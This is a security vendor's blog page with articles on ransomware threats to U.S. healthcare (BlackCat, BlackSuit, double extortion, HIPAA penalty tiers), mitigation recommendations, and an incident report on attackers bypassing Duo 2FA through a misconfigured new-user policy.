Articles written by Adlumin’s Threat Research Team on emerging threats, industry stats, and defense tactics against cyberattacks.

Adlumin’s Threat Insights 2024: Volume II

Adlumin’s Threat Insights 2024 Volume II highlights significant trends, cyberattacks, and vulnerabilities faced by U.S. and global sectors, as observed by Adlumin’s Threat Research Team for March, April and May 2024. Discover three emerging threats, each presenting unique challenges to cybersecurity professionals.

Stay informed and proactive to defend your organization’s assets against evolving cyber threats in a dynamic landscape.
Stay informed and proactive to defend your organization’s assets against evolving cyber threats in a dynamic landscape.

Transforming Cutting-Edge Threat Research into Defense Strategies

Join our webinar on June 28th, 2024, focusing on cyber threats in educational institutions. Featuring insights from Adlumin’s Threat Research team and industry expert Mark Sangster, learn actionable strategies to strengthen your defenses. Topics include live demonstrations of MFA bypass techniques and tailored solutions for K-12 and higher education challenges.

Cybersecurity for Healthcare 2024: Mitigation Strategies

Industry Spotlight: Healthcare

In our quarterly industry spotlight series, we highlight the evolving threats faced by various industries and provide recommendations to enhance their security posture. Today, we shift our focus to the healthcare sector, a critical industry that faces unique challenges in safeguarding sensitive patient data and maintaining crucial healthcare operations. 

Mitigating cybersecurity risks is critical in the healthcare industry due to the highly sensitive nature of patient information stored within Electronic Health Records (EHRs) and the important role these systems play in patient care. Healthcare organizations are prime targets for cybercriminals seeking to exploit vulnerabilities for financial gain or disrupt essential services.  

Recent cyberattacks on healthcare organizations, like the Change Healthcare cyberattack, have demonstrated the growing sophistication and persistence of threat actors targeting this sector. Ransomware attacks, such as those leveraging Ransomware-as-a-Service (RaaS) and employing double extortion techniques, have caused significant disruptions and financial losses for healthcare providers. In response to these threats, organizations recognize the need to strengthen their cybersecurity defenses. 

Top Threat: Ransomware

Adlumin previously detailed significant trends and developments in the threats, vulnerabilities, and cyberattacks faced by the healthcare industry in the U.S observed from January to March 2024 by Adlumin’s Threat Research Team, in Cybersecurity for Healthcare: 2024 Threat Insights. 

Healthcare Threat Highlights: 

  • Ransomware was identified as a top threat to the healthcare industry in the U.S. in Q1 2024 
  • Surge in ransomware attacks targeting healthcare organizations 
  • Increase in double extortion tactics by ransomware gangs like AlphV/BlackCat and BlackSuit 
  • Disruption of patient care operations and regulatory risks under HIPAA regulations 
  • Growing use of Living-Off-the-Land techniques by attackers to evade detection 
  • Emphasis on heightened security measures and preparedness to mitigate ransomware threats 

Shifting from the identification of ransomware as the top threat in the healthcare industry, Adlumin’s Threat Research Team has developed crucial mitigation strategies and recommendations to help healthcare organizations better defend against these malicious attacks. Let’s explore key strategies recommended by Adlumin’s experts to enhance cybersecurity resilience in the healthcare sector. 

Mitigation Strategies & Adlumin Recommendations 

Cybercriminals are continuously evolving their strategies, highlighting the importance for entities within the healthcare sector to remain alert and proactive. Key developments in their methodologies include: 

  1. Practice Good Cyber Hygiene
    • Stay Informed of the Threat Landscape: Leverage resources from CISA, HHS 405(d), and the H-ISAC to enhance organization’s resilience against such formidable cyber threats and complex threat landscape.
    • Regular Software Updates and Patch Management: Ensure that all software, especially operating systems, and applications, are kept up to date with the latest patches to close security vulnerabilities.
    • Endpoint Protection Solutions: Deploy advanced endpoint protection platforms (EPPs) that include antivirus, antimalware, and EDR (Endpoint Detection and Response).
    • Network Segmentation: Segment networks to limit the spread of ransomware. Critical systems and sensitive data should reside in separate segments with strict access controls.
  2. Enhanced Detection and Response Capabilities
    • Security Monitoring and Anomaly Detection: Utilize security information and event management (SIEM) systems, along with AI and machine learning-based anomaly detection to identify unusual activity patterns indicative of a breach.
    • Integration of Managed Detection and Response (MDR) Systems: One of the key advantages of MDR systems is the ability to integrate and analyze security data from a wide range of sources, including endpoint systems, endpoint detection and response products, network devices, and more. This integration allows for a more comprehensive view of the security landscape, enabling the identification of complex attack patterns and subtle indicators of compromise that might be missed when these systems operate in isolation.
    • Implement a Zero Trust Architecture: Assume that threats can come from anywhere and verify every access request as if it originates from an open network. This involves strict identity verification, least privilege access, and micro-segmentation.
    • Incident Response Planning: Develop, maintain, and regularly test an incident response plan that includes procedures for ransomware attacks. This plan should outline roles, responsibilities, communication strategies, and recovery processes.
  3. Data Protection and Backup Strategies
    • Regular, Secure Backups: Maintain regular backups of critical data and systems, storing them in an isolated environment that is not accessible from the network where the primary data resides.
    • Immutable Backup Solutions: Use immutable backups where possible, ensuring that data cannot be altered or deleted after it’s written.
    • Encryption of Sensitive Data: Encrypt sensitive data both at rest and in transit to protect it from unauthorized access and reduce the impact of data theft.
    • Immutable Log Storage: Logs should be backed up and stored in a separate immutable and guaranteed system to avoid tampering and assure integrity.
  4. User Training and Awareness
    • Security Awareness Training: Conduct regular training sessions for all staff members on cybersecurity best practices, phishing awareness, and procedures for reporting suspicious activities.
    • Simulated Phishing Exercises: Carry out simulated phishing attacks to assess staff vigilance and reinforce training on identifying and responding to phishing attempts.
  5. Regulatory Compliance and Reporting
    • HIPAA Compliance: Ensure that all cybersecurity measures comply with HIPAA regulations to protect patient health information (PHI).
    • Breach Notification Procedures: Develop clear procedures for breach notification in compliance with regulatory requirements, ensuring timely communication with affected individuals and regulatory bodies.
  6. Special Attention to Emerging Threats
    • Monitor Emerging Ransomware Tactics: Stay informed about new ransomware tactics, such as double extortion and supply chain attacks, adapting defense mechanisms accordingly.
    • valuate Security of Third-Party Vendors: Conduct thorough security assessments of third-party vendors and insist on compliance with stringent security standards to mitigate supply chain risks.
    • Pay Special Attention to Electronic Health Records (EHR) Systems: EHR’s like Epic present an enticing target to attackers while holding critically sensitive patient health data and enabling healthcare operations. Strategies should be in place for isolating EHR enabling systems from other machines and for dealing with potential lengthy EHR system outages.

Eliminate Risks from One Centralized Location 

For healthcare organizations looking to amplify their cybersecurity resilience against the pervasive threat of ransomware and other evolving cyber threats, the implementation of a comprehensive and integrated security strategy is paramount. By leveraging a centralized Security Operations Platform that incorporates all the recommended mitigation strategies and practices, organizations can streamline their cybersecurity efforts and enhance their ability to detect, respond to, and mitigate potential threats effectively.  

Additionally, partnering with Managed Detection and Response (MDR) services can provide organizations with the expertise, tools, and continuous monitoring needed to mitigate risks, optimize threat response, and ensure a proactive defense against cyber threats. By adopting this holistic approach, healthcare organizations can strengthen their cybersecurity posture, safeguard patient data, and protect critical infrastructure in the face of threats. 

Adlumin Platform - Ransomware Prevention

Explore the Platform 

Adlumin ensures swift setup, unrivaled visibility spanning endpoints, users, and the perimeter, and provides contextual insights for rapid, informed decision-making.

Adlumin’s Threat Research Team is the innovator behind Adlumin’s comprehensive threat hunting to improve visibility, reduce complexity, and manage risk. The team proactively searches for cyber threats lurking undetected in your network environment. They dig deep to identify non-remediated threats and other malicious activities to reinforce security defenses. 

Cybersecurity for Healthcare: 2024 Threat Insights

The recent ransomware attack on UnitedHealth’s Change Healthcare subsidiary highlighted the attractiveness of the data-rich U.S. healthcare industry to cybercriminals and the severe impact on patients and doctors. Total expenses from the attack are expected to surpass $1 billion, including a $22 million ransomware payment. With cybercriminals leveraging sophisticated techniques to infiltrate systems, encrypt data, and extract sensitive information, the healthcare sector faces significant challenges in safeguarding patient records and maintaining operational efficiency.

This industry spotlight highlights significant trends and developments in the threats, vulnerabilities, and cyberattacks faced by the healthcare industry in the U.S observed from January to March 2024 by Adlumin’s Threat Research Team. 

Industry Spotlight: The Healthcare Industry

Top Threat: Ransomware

Last year, the FBI’s Internet Crime Complaint Center released its latest report on Internet crimes and identified the healthcare and public health sectors as the most victimized by ransomware[1]. In fact, the healthcare sector had over 33% more reported victims than the second leading sector, critical manufacturing; 82% more than government facilities, and well more than double the number reported by the financial service sector. While waiting for the latest data reflecting 2023 cases, it’s almost certain that the healthcare sector will continue to see more ransomware attacks.

Ransomware gangs which operate under affiliate models often capture vital data, impose hefty ransoms for data retrieval, and significantly hinder patient care operations. The ransomware affiliate model resembles legitimate affiliate programs – hackers code the malware, while affiliates distribute it through Ransomware-as-a-Service (RaaS), then share the ransom profits. There may also be shared infrastructure for payout and money laundering operations. Combined, this lowers the barrier to entry for attackers and increases attack volume, fueling the overall threat.

Adlumin has observed wide adoption of a tactic known as double extortion in healthcare sector attacks. In double extortion operations, attackers encrypt sensitive and critical data as part of traditional ransomware operations, and exfiltrate or steal sensitive data. Ransomware actors then threaten public release of the data, meant to force payment of hefty ransoms even if defenders can recover encrypted data and systems from backups or other sources.

Adlumin has also observed ransomware operators increasingly threaten to report victims to regulatory authorities such as the SEC, resulting in almost certain fines if applicable under a host of old and new laws and regulations. Additionally, in uncovering Play ransomware. operations, Adlumin uncovered that ransomware attackers threaten to notify organization’s partners and customers as part ransom messages, a tactic meant to coerce payment. These factors can be especially important for those in the healthcare sector as HIPAA (Health Insurance Portability and Accountability Act) can impose fines for data breaches involving protected health information (PHI). The four categories used for the penalty structure are:[2]

TierDescriptionFines per Violation*
Tier 1A violation that the covered entity was unaware of and could not have realistically avoided, had a reasonable amount of care been taken to abide by HIPAA Rules.$137 to $68,928
Tier 2A violation that the covered entity should have been aware of but could not have avoided even with a reasonable amount of care (but falling short of willful neglect of HIPAA Rules).$1,379 to $68,928
Tier 3A violation suffered as a direct result of “willful neglect” of HIPAA Rules, in cases where an attempt has been made to correct the violation.$13,785 to $68,928
Tier 4A violation of HIPAA Rules constituting willful neglect, where no attempt has been made to correct the violation within 30 days.$68,928 to $2,067,813

*Yearly cap of $2,067,813

Ransomware operators are also beginning to forgo encryption entirely, favoring data exfiltration and extortion operations. Both types have seen usage of Living-Off-the-Land (LOTL) techniques.

LOTL attacks are a stealthy tactic where attackers exploit legitimate tools already present on a system, like PowerShell, the command prompt, or native binaries like certutil, to carry out malicious activities. These “Living Off the Land Binaries” (LOLBins) blend in with normal system operations, making them more difficult to detect and allows attackers to steal data, move laterally within a network, or gain persistence without relying on easily identifiable malware.

Healthcare Top Threats

AlphV/BlackCat

On December 19, 2023, the FBI announced disruption of RaaS operations carried out by AlphV (also known as “BlackCat”). The FBI seized several websites created by the group and gained visibility into the BlackCat ransomware group’s computer network as part of the investigation[3]. Additionally, authorities offered victims access to an FBI-developed decryption tool allowing for recovery of encrypted data.

In response BlackCat called for open season against the healthcare sector stating, “Because of their actions, we are introducing new rules, or rather, we are removing ALL rules except one, you cannot touch the CIS. You can now block hospitals, nuclear power plants, anything, anywhere.”[4]

On February 27, 2024, CISA, the FBI, and the Department of Health and Human Services (HHS), released a joint advisory which addressed BlackCat’s operations and attacks against the healthcare sector. They noted that, “Since mid-December 2023, of the nearly 70 leaked victims, the healthcare sector has been the most victimized. This is likely in response to the AlphV / Blackcat administrator’s post encouraging its affiliates to target hospitals after operational action against the group and its infrastructure in early December 2023.”[5]

In late February 2024, as part of attacks against the healthcare sector, insurance provider UnitedHealth found itself in the crosshairs of BlackCat operations, it was reported the attack “had a knock-on effect on players across the U.S. healthcare system, as disruptions triggered by the attack have impacted electronic pharmacy refills and insurance transactions.”[6] In a quickly deleted post to its darknet hosted website, BlackCat stated that it stole millions of sensitive records.

BlackSuit Ransomware

In November 2023, the Health Sector Cybersecurity Coordination Center (HC3) at the U.S. Department of Health and Human Services (HHS), released a detailed analysis on BlackSuit, a new ransomware strain that poses a credible threat to the healthcare and public health (HPH) sector.

BlackSuit emerged in May 2023 and exhibits significant parallels to the Royal ransomware family, which succeeded the infamous Conti group linked to Russia. BlackSuit’s ties to these active threat actors suggest ongoing, aggressive targeting of the healthcare industry. HC3 outlined BlackSuit’s operations, including its use of double extortion tactics, specific technical details, and potential impact on healthcare services, alongside recommended defenses, and mitigation strategies.

As outlined in the HC3 report, BlackSuit’s impact could be significant, particularly if the group’s ties to the Royal and Conti ransomware families are confirmed. With its use of double extortion tactics, BlackSuit not only encrypts sensitive data on compromised healthcare networks but also threatens to leak stolen data unless a ransom is paid. This approach poses a dual threat: the immediate disruption of healthcare services due to inaccessible patient records and systems, and the long-term damage from the potential exposure of confidential patient data.

BlackSuit operates by encrypting sensitive data on compromised networks, employing a double extortion scheme that has so far targeted a limited number of victims across various sectors, including healthcare, in countries such as the U.S., Canada, Brazil, and the U.K. The analysis reveals BlackSuit’s operational techniques, encrypted file extensions, ransom demand methods, and its distribution via infected email attachments, torrent websites, malicious ads, and trojans.

Despite its limited use, the connections to Royal and Conti hint at a potentially significant threat landscape for the healthcare sector. Technical similarities with the Royal ransomware family, based on binary comparison tools, suggest BlackSuit could be a variant or affiliate of these larger, well-organized ransomware operations.

HHS emphasizes the importance of heightened security measures and preparedness within the healthcare industry to mitigate risks associated with ransomware attacks.

Recommendations to Eliminate Risks

To protect against evolving cyber threats in the healthcare sector, Adlumin recommends practicing good cyber hygiene by staying informed of the threat landscape, updating software regularly, implementing a Security Awareness Program, and deploying endpoint protection solutions.

Adlumin’s threat research team advises healthcare organizations to regularly update software, segment their networks, and plan for incident response. They also recommend implementing security monitoring, and anomaly detection tools. In addition, secure backups, encryption of sensitive data, and HIPAA compliance are crucial elements of a strong cybersecurity strategy.

With a deep understanding of the healthcare sector’s unique challenges and vulnerabilities, Adlumin stands as a reliable partner in strengthening cybersecurity posture and ensuring regulatory compliance. Partnering with Adlumin equips healthcare organizations with the necessary tools and expertise to combat ransomware and protect critical infrastructure effectively.

Stay tuned, Adlumin’s Threat Research team is releasing in-depth mitigation strategies for the healthcare sector.

Misconfiguration in Zero-Trust Solution Could Allow Threat Actors to Bypass 2FA

The Adlumin team recently investigated a security incident in which a malicious actor(s) successfully managed to gain unauthorized access to a company’s networks by completely bypassing Duo, a popular zero-trust security solution used by hundreds of organizations worldwide.

Background

The incident occurred in early February 2024 when threat actor(s) used two compromised sets of email credentials to log in remotely to the targeted company’s network from servers with IP addresses registered to Russia and Brazil. Subsequently, the company’s security tools, including Adlumin, generated several alerts for malicious activity detected within the network. This activity included credential brute forcing attempts, attacks against Microsoft Active Directory and Kerberos, and the use of Netscan to enumerate endpoints and servers.

Security teams responded to the alerts and successfully halted and locked out the threat actors before they could inflict more harm on the network, but questions remained as to why Duo’s two-factor authentication (2FA) was not prompted to verify the legitimacy of the login sessions which would have protected against compromised credential-based attacks.

Investigation Findings

The Adlumin investigation revealed that the two compromised email accounts used by the threat actor(s) were stale accounts which had been mistakenly configured with a policy that allows for unenrolled or partially enrolled users to authenticate into their network without 2FA.

According to Duo’s online documentation (last updated on Jan. 29, 2024), a “New User Policy” to allow access without 2FA, does not prompt users to complete enrollment and they are granted access without two-factor authentication.1

This type of user policy is made available to organizations for several reasons, including facilitating a gradual rollout of 2FA within the organization or a slow adoption of new zero-trust practices. However, it remains important to monitor events generated by users that bypass 2FA. Duo does offer such a monitoring feature to companies using Duo Premier, Duo Advantage, and Duo Essentials Plan.

With any 2FA solution, it’s important to consider the risks of enabling or using user policies that bypass it in any scope. Bypassing 2FA for certain users or scenarios reduces the overall security posture of the system and network. It can create fringe but exploitable instances where authentication relies solely on a single factor (e.g., username and password) that may be more susceptible to compromise – which was the case in the security incident investigated by Adlumin.

When users are not required to use 2FA, there is an increased vulnerability window. Attackers may exploit this period, especially if users with reduced authentication factors can enable access to sensitive information or critical systems.

In its online documentation, Duo does warn account owners and administrators who configure login access to remember that users with bypass status are not subject to restrictions and can bypass Duo authentication entirely.2

Conclusion

To protect against similar attacks at organizations that use Duo or other zero-trust solutions, Adlumin recommends that companies and organizations ensure user access policies are correctly configured and consider the security risks that come with allowing some users to bypass 2FA.

Organizations can avoid or reduce their exposure to an attack by practicing good account hygiene. This includes routinely conducting account reviews to identify and deactivate accounts that are no longer needed, establishing efficient communication between IT departments and human resources when employees leave an organization, and automating account provisioning and deprovisioning processes.

Indicators of Compromise (IOCs)